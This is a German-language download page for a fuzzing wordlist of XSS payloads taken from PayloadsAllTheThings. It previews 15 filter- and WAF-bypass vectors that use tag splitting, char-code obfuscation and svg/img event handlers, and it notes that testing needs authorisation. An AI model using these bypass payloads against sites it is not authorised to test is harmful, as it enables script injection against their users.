XSS WAF-Bypass Intruders (PayloadsAllTheThings)
Kuratierte XSS-Vektoren mit Schwerpunkt auf Filter- und WAF-Umgehung, einschließlich Tag-Splitting, Char-Code-Verschleierung und fehlerhaften svg-/img-Handlern. Zum Umgehen von Eingabefiltern beim XSS-Testen.
- Größe
- 11 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- wfuzzburpffuf
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (11 KB) herunter oder kopiere sie über die Schaltflächen oben.
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>Kuratierte XSS-Vektoren mit Schwerpunkt auf Filter- und WAF-Umgehung, einschließlich Tag-Splitting, Char-Code-Verschleierung und fehlerhaften svg-/img-Handlern. Zum Umgehen von Eingabefiltern beim XSS-Testen.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 11 KB und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.